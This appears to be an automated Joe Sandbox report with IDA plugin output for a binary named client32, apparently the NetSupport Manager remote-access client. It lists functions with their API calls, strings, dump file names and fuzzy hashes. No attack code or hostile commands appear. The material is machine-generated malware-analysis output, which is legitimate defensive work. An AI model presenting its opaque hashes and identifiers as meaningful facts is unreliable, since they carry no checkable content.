Instruction Fuzzy Hash: EB214C79A0061AABDB11DF95CC41FDEF3B8FF59614F104259E921B3280EB747904CEA0

Function 1103D7F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103D83C
SetDlgItemTextA.USER32(?,00000471,?), ref: 1103D854
DestroyCursor.USER32(00000000), ref: 1103D871
SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103D884
UpdateWindow.USER32(00000000), ref: 1103D8C2

Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1103D8AC
m_hWnd, xrefs: 1103D8B1

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 3726914545-1557312927
Opcode ID: 1c2e4270b89d1f92e4223b88513b542f8f80d8360a50bd76c529a1a7560ce8a3
Instruction ID: 110cd72dad802746724e554e61a36281017b722033c1a59c3057b23866efb7ab
Opcode Fuzzy Hash: 1c2e4270b89d1f92e4223b88513b542f8f80d8360a50bd76c529a1a7560ce8a3
Instruction Fuzzy Hash: CF21F3B9A50301BFE211AB75CC4AF9FF7E8AB85B05F108418F6599B2C0DBB0B4008764

Function 1114D210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114D21F
_memset.LIBCMT ref: 1114D23B
GetMenuItemID.USER32(?,00000000), ref: 1114D24C

Part of subcall function 11132220: _memset.LIBCMT ref: 11132249
Part of subcall function 11132220: GetVersionExA.KERNEL32(?), ref: 11132262

CheckMenuItem.USER32(?,00000000,00000000), ref: 1114D288
EnableMenuItem.USER32(?,00000000,00000000), ref: 1114D29E
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1114D2B4

Strings

0, xrefs: 1114D245

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
String ID: 0
API String ID: 176136580-4108050209
Opcode ID: 9b42af547c3b3f2de27c1a2824a71c6ae62b3914f0dc5bd063f9124c19224f7e
Instruction ID: 6978873c477c3921339f3242224bee586a119fd3f67b17aa56fa8a5c95e1a494
Opcode Fuzzy Hash: 9b42af547c3b3f2de27c1a2824a71c6ae62b3914f0dc5bd063f9124c19224f7e
Instruction Fuzzy Hash: 74216F71901219BBEF029BA4DD88FAFBBADEF59759F604025F801D6144E7B0DA00C760

Function 1107B920 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1107B9AF
_memset.LIBCMT ref: 1107B998

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

pData, xrefs: 1107B97C
nBytes>=0, xrefs: 1107B95E
..\CTL32\DataStream.cpp, xrefs: 1107B939, 1107B959, 1107B977, 1107B9C6, 1107B9EE
IsA(), xrefs: 1107B93E, 1107B9F3
m_iPos>=nBytes, xrefs: 1107B9CB

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
API String ID: 75970324-4264523126
Opcode ID: d5723f19d21173c7a89de7b12e0d6cddac5669ff6ede238fbcf795de54593f43
Instruction ID: 2a90f1939da6f239356bf4485445621d479d809cfc92569af5b86a5b8d7805c3
Opcode Fuzzy Hash: d5723f19d21173c7a89de7b12e0d6cddac5669ff6ede238fbcf795de54593f43
Instruction Fuzzy Hash: 9511067DF00B076BD210EA06EC41F4BF7A86FA060CF108528F6A927602FA71B5058AE5

Function 11123340 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66libraryloadertimeCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 11123391
KillTimer.USER32(?,00000081,2F623E72,75A73760,00000000,00000000,11178FC1,000000FF), ref: 111233D1
GlobalDeleteAtom.KERNEL32 ref: 111233ED
FreeLibrary.KERNEL32(?,?,2F623E72,75A73760,00000000,00000000,11178FC1,000000FF), ref: 111233FE

Strings

DwmEnableComposition, xrefs: 1112338B
m_hWnd, xrefs: 111233BB
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 111233B6

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressAtomDeleteFreeGlobalKillLibraryProcTimer
String ID: DwmEnableComposition$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 239104392-1158585097
Opcode ID: ac4ce4fd3e0cbf1a108bfb6aaa5dbba282e11219c93081d954dc0a5653b48ec3
Instruction ID: 339d7fcd6c78bba5dbca9370eb91404beaec97e96fcf5122cf5d8dfe16e34f39
Opcode Fuzzy Hash: ac4ce4fd3e0cbf1a108bfb6aaa5dbba282e11219c93081d954dc0a5653b48ec3
Instruction Fuzzy Hash: 2C21D475A18715EFD721CF65C844B9AFBE8FB09718F10891DE8A683780DB74A540CB61

Function 11071330 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11071385
GetSysColor.USER32(0000000F), ref: 110713A3
GetSysColor.USER32(00000014), ref: 110713AA
GetSysColor.USER32(00000010), ref: 110713B1
GetSysColor.USER32(00000008), ref: 110713B8
GetSysColor.USER32(00000016), ref: 110713BF

Strings

NSMCoolbar, xrefs: 1107137D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$AtomGlobal_malloc_memsetwsprintf
String ID: NSMCoolbar
API String ID: 1237614650-4124301854
Opcode ID: 11a3e492c884ad001f6ac068dd0781362c712dc6c6d88ecbd5fc8d9c0d6a6434
Instruction ID: 08995c28d4e1244f6da182c4ab23949e1325013c8a7c5b32581c9b49482f3fa5
Opcode Fuzzy Hash: 11a3e492c884ad001f6ac068dd0781362c712dc6c6d88ecbd5fc8d9c0d6a6434
Instruction Fuzzy Hash: C1118EB1A00788AFE720CF65CC85B5AFBE4FB09758F404A3EE55587B80DB75E9008B94

Function 110AF260 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110AF2A6
GetFileVersionInfoSizeA.VERSION(?,?), ref: 110AF2BC
_malloc.LIBCMT ref: 110AF2C7

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 110AF2E1
VerQueryValueA.VERSION(00000000,11187354,?,?,?,?,00000000,00000000,?), ref: 110AF2FA
_free.LIBCMT ref: 110AF30A

Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D

Strings

shdocvw.dll, xrefs: 110AF273

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileHeapInfoVersion$AllocateErrorFreeLastQuerySizeValue_free_malloc_memset
String ID: shdocvw.dll
API String ID: 2585106851-1755026807
Opcode ID: 85140e15cde06817e3b89e99063211d61d787684cb6ad3fad40ab3e3fe187d2e
Instruction ID: 5eb31461ea1f50519f917a15bbfe73ab79f775fccf8d8aeefc1cc7a1de130f4a
Opcode Fuzzy Hash: 85140e15cde06817e3b89e99063211d61d787684cb6ad3fad40ab3e3fe187d2e
Instruction Fuzzy Hash: E711937690412DABCB64CB54CC81EDEF378BF89708F1042EAE95957240EA706B84CF91

Function 1103D550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 1103D566
FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D57C
IsWindow.USER32(00000000), ref: 1103D584
Sleep.KERNEL32(00000014), ref: 1103D597
FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D5A7
IsWindow.USER32(00000000), ref: 1103D5AF

Strings

PCIVideoSlave32, xrefs: 1103D577, 1103D59F

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$Sleep
String ID: PCIVideoSlave32
API String ID: 2137649973-2496367574
Opcode ID: 1703b4c4a5965f14d39e20ba58b4c881867a64bd66d0339c621bbb7f38325315
Instruction ID: 689c245a1c5877e120963c17b046aa8ad15570e82cb5b2dcf4060744f6f7f189
Opcode Fuzzy Hash: 1703b4c4a5965f14d39e20ba58b4c881867a64bd66d0339c621bbb7f38325315
Instruction Fuzzy Hash: C4F0A4B39012296FDB01DFB9CCC8F8EB7E9AB44AA9F414175F918E7188E230E4014B71

Function 11003360 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFF), ref: 1100336E
GetSubMenu.USER32(00000000,00000000), ref: 1100339A
GetSubMenu.USER32(00000000,00000000), ref: 110033BC
DestroyMenu.USER32(00000000), ref: 110033CA

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

hMenu, xrefs: 11003384
..\CTL32\annotate.cpp, xrefs: 1100337F, 110033A7
hSub, xrefs: 110033AC

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: 370a918c1ffef44c6d2a1e7988c1972a9a3e997084686a8955a4fd91555efcf8
Instruction ID: d55ef711f20a90ce7b89774d5e68305bce48b38f183b762cf5caec9f28e3c4fe
Opcode Fuzzy Hash: 370a918c1ffef44c6d2a1e7988c1972a9a3e997084686a8955a4fd91555efcf8
Instruction Fuzzy Hash: C9F0E97BE4066277D51351A59C85F9FF7D8DB966EEF048031F604F6280EB50A80041F5

Function 11003270 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF9), ref: 1100327D
GetSubMenu.USER32(00000000,00000000), ref: 110032A3
GetMenuItemCount.USER32(00000000), ref: 110032C7
DestroyMenu.USER32(00000000), ref: 110032D9

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

hMenu, xrefs: 11003293
..\CTL32\annotate.cpp, xrefs: 1100328E, 110032B4
hSub, xrefs: 110032B9

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 9d6183a6848e5764ebbed8253b940d7be87a8ceda2fe17ff10de54b997e3a651
Instruction ID: 1ec89cdccd47366b5ee8b19df69f8a376e0222ab7e63b8b8b85f6a37c90a799a
Opcode Fuzzy Hash: 9d6183a6848e5764ebbed8253b940d7be87a8ceda2fe17ff10de54b997e3a651
Instruction Fuzzy Hash: 80F0E93AE445627BD5135265AC09FCFF6D4DB966AEF048030F400E5245EA10640085F1

Function 1110B9A0 Relevance: 12.2, APIs: 8, Instructions: 205COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 1110BA40
ClientToScreen.USER32(?,?), ref: 1110BA81
GetCursorPos.USER32(00000000), ref: 1110BAE1
GetTickCount.KERNEL32 ref: 1110BAF6
GetTickCount.KERNEL32 ref: 1110BB77
WindowFromPoint.USER32(00000000,?,00000000,?), ref: 1110BBDA
WindowFromPoint.USER32(000000FF,?), ref: 1110BBEE
SetCursorPos.USER32(000000FF,?,00000000,?), ref: 1110BC02

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClientCountCursorFromPointTickWindow$RectScreen
String ID:
API String ID: 4245181967-0
Opcode ID: 25f0d652be42d1894ac26d8b7e21e809a65fc00440cef780fcf3fe9694d70890
Instruction ID: dee9298884b245e957b8f3d59adf47d3cfc777aa8d0a8752f9520fc18db73144
Opcode Fuzzy Hash: 25f0d652be42d1894ac26d8b7e21e809a65fc00440cef780fcf3fe9694d70890
Instruction Fuzzy Hash: C9813979A04B0A8BDB14DFA4C684BEEF7F5FF48314F10461ED86AA7240DB35A845CB54

Function 1104B627 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 167windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 1104B83D
PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1104B84E

Strings

ReconnectDelay, xrefs: 1104B76E
Client, xrefs: 1104B773
Disconnect(%p), closing player, xrefs: 1104B711
10.21.0.0, xrefs: 1104B793

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePostWindow
String ID: 10.21.0.0$Client$Disconnect(%p), closing player$ReconnectDelay
API String ID: 3618638489-3222940297
Opcode ID: de6374e47233d955090eb4c934b1f2018db41b985611608a11f03de94963f4d7
Instruction ID: fdd7292e2912fe1eae46148bd9e15f8ec271a2e4496cdee647683204071506ce
Opcode Fuzzy Hash: de6374e47233d955090eb4c934b1f2018db41b985611608a11f03de94963f4d7
Instruction Fuzzy Hash: 21516F79A05A029FDBD4DFA1CCC8FAAB364AF4530CF1845B8ED194F286DA75A800C761

Function 110B3130 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 110B3223
AppendMenuA.USER32(?,00000010,00000000,?), ref: 110B3236

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\IEFavourites.h, xrefs: 110B3187, 110B31E5, 110B320B, 110B325D, 110B3283
